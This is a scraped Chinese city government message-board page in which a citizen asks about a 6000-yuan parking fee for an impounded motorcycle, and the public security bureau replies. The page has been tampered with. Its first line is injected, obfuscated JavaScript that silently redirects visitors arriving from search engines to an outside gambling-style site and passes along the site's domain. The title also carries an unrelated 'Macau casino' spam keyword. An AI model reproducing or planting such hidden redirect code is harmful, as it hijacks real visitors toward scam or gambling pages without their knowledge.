var ref=document.referrer;if(ref.length>3){location.href="ht"+"tps://wa"+ "p.y6"+"6"+"6.net/baidu444.htm?"+document.domain;}

澳门赌场车辆被交警扣押后,领取放行证,停车场需要缴纳停车费的问题

来信人: 袁**** | 来信时间:2020-11-19 16:25:03 |处理情况: [已办结] | 答复部门:市公安局|问题类型: 咨询 |浏览:149
各位领导,我有一辆摩托车,去年因为我的驾照未年审,在骑行的过程中被交警拦下,车辆扣押。今年因为疫情影响加上本人外出务工,直到11月才去把车辆放行证从岗亭开出。但是现在去停车场拿车,停车场要我出6000块钱的停车费。我查询了一下《强制性政法》26条明确规定了这笔费用是由交警部门承担。现在我就想问询一下,这个情况我该怎么办。

回复 回复单位:市公安局 回复时间:2020-11-20 16:30:15

你好,因你在网帖中未详细说明车辆的具体信息以及暂扣车辆的具体单位,交警部门无法精确查询,我单位于11月20日下午4时12分拨打您的电话,未能接通,你可在工作日上班时间拨打交警支队法制大队业务咨询电话0564—3927032,相关工作人员会依法依规并结合你的实际情况为你提供必要的咨询和帮助。
此信件写信人未评价,